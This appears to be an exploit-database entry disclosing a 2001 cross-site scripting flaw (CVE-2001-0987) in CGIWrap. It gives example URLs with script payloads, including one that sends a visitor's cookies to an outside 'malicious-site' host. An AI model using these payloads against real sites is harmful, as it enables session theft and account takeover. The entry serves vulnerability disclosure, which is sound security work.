CGIWrap 2.x/3.x - Cross-Site Scripting
Author: TAKAGI Hiromitsu
type: remote
platform: cgi
port:
date_added: 2001-07-22
date_updated: 2017-11-15
verified: 1
codes: CVE-2001-0987;OSVDB-1909
tags:
aliases:
screenshot_url:
application_url:
raw file: 21023.txt
source: https://www.securityfocus.com/bid/3081/info
CGIWrap is a free, open-source program for running CGI securely.
CGIWrap does not filter embedded scripting commands from user-supplied input. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser.
http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
JavaScript code will be executed:
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>
Stealing your Cookies issued by www.example.org, if any:
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
![$site['alt']](/img/irfan-toor-32-dark.jpeg)
Irfan TOOR